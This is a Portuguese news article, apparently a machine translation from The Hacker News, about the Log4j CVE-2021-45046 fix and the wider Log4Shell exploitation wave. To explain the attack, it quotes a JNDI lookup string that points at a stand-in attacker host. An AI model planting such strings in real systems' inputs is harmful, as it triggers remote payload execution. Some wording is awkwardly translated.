Segunda vulnerabilidade Log4j (CVE-2021-45046) descoberta – Novo patch lançado

A Apache Software Foundation (ASF) lançou uma nova correção para o utilitário de registro Log4j depois que o patch anterior para o exploit Log4Shell divulgado recentemente foi considerado como “incompleto em certas configurações não padrão.”

A segunda vulnerabilidade – rastreada como CVE-2021-45046 – é classificada como 3,7 de um máximo de 10 no sistema de classificação CVSS e afeta todas as versões do Log4j de 2.0-beta9 a 2.12.1 e 2.13.0 a 2.15.0, que os mantenedores do projeto enviados na semana passada para resolver uma vulnerabilidade crítica de execução remota de código (CVE-2021-44228) que poderia ser abusada para se infiltrar e assumir o controle de sistemas.

O remendo incompleto para CVE-2021-44228 , poderia ser abusado “para embarcações de dados de entrada utilizando um maliciosos JNDI padrão de pesquisa, resultando em um (DoS) de negação de serviço,” o ASF disse em um novo aviso. A versão mais recente do Log4j, 2.16.0 (para usuários que requerem Java 8 ou posterior), quase remove o suporte para pesquisas de mensagens e desabilita o JNDI por padrão, o componente que está no centro da vulnerabilidade. Recomenda-se aos usuários que precisam do Java 7 atualizar para o Log4j versão 2.12.2 quando estiver disponível.

“Lidar com o CVE-2021-44228 mostrou que o JNDI tem problemas de segurança significativos”, explicou Ralph Goers do ASF . “Embora tenhamos atenuado o que sabemos, seria mais seguro para os usuários desativá-lo completamente por padrão, especialmente porque a grande maioria provavelmente não o usará.”

JNDI, abreviação de Java Naming and Directory Interface, é uma API Java que permite que aplicativos codificados na linguagem de programação consultem dados e recursos, como servidores LDAP . Log4Shell é residente na biblioteca Log4j, uma estrutura de registro de código aberto baseada em Java comumente incorporada em servidores da web Apache.

O problema em si ocorre quando o componente JNDI do conector LDAP é aproveitado para injetar uma solicitação LDAP maliciosa – algo como “$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}” – que, quando conectado em um servidor da web executando a versão vulnerável da biblioteca, permite que um adversário recupere uma carga útil de um domínio remoto e a execute localmente.

A última atualização chega como consequência da falha que resultou em uma “verdadeira pandemia cibernética”, com vários agentes de ameaça aproveitando o Log4Shell de maneiras que estabelecem as bases para novos ataques , incluindo a implantação de mineradores de moedas, trojans de acesso remoto e ransomware em pessoas suscetíveis máquinas. As intrusões oportunistas teriam começado pelo menos desde 1º de dezembro, embora o bug tenha se tornado de conhecimento comum em 9 de dezembro.

A falha de segurança gerou um grande alarme porque existe em uma estrutura de registro usada quase onipresente em aplicativos Java, apresentando aos malfeitores um portal sem precedentes para penetrar e comprometer milhões de dispositivos em todo o mundo.

Soletrando mais problemas para as organizações, a falha explorável remotamente também afeta centenas dos principais produtos corporativos de várias empresas, como Akamai , Amazon , Apache , Apereo , Atlassian , Broadcom , Cisco , Cloudera , ConnectWise , Debian , Docker , Fortinet , Google , IBM , Intel , Juniper Networks , Microsoft , Okta ,Oracle , Red Hat , SolarWinds , SonicWall , Splunk , Ubuntu , VMware , Zscaler e Zoho , representando um risco significativo para a cadeia de suprimentos de software.

“Ao contrário de outros ciberataques principais que envolvem um ou um número limitado de software, Log4j é basicamente embutido em cada produto baseado em Java ou serviço web. É muito difícil de corrigir manualmente,” Israel empresa de segurança Check Point disse . “Esta vulnerabilidade, devido à complexidade de corrigir e à facilidade de exploração, parece que permanecerá conosco por muitos anos, a menos que as empresas e serviços tomem medidas imediatas para evitar os ataques a seus produtos implementando uma proteção.”

Nos dias após a divulgação do bug, pelo menos dez grupos diferentes entraram no movimento da exploração e cerca de 44% das redes corporativas em todo o mundo já estiveram sob ataque, marcando uma escalada significativa. A Agência de Segurança Cibernética e de Infraestrutura dos Estados Unidos (CISA) também adicionou Log4Shell ao seu Catálogo de Vulnerabilidades Exploradas Conhecidas , dando às agências federais um prazo de 24 de dezembro para incorporar patches para a vulnerabilidade.

Sean Gallagher, um pesquisador sênior de ameaças da Sophos, alertou que “os adversários provavelmente estão conseguindo o máximo de acesso a tudo o que podem agora com o objetivo de monetizar e / ou capitalizar sobre isso mais tarde”, acrescentando que há uma calmaria antes do tempestade em termos de atividade mais nefasta da vulnerabilidade Log4Shell. “

“A prioridade mais imediata para os defensores é reduzir a exposição corrigindo e mitigando todos os cantos de sua infraestrutura e investigar sistemas expostos e potencialmente comprometidos. Essa vulnerabilidade pode estar em qualquer lugar”, acrescentou Gallagher.

Fonte: https://thehackernews.com/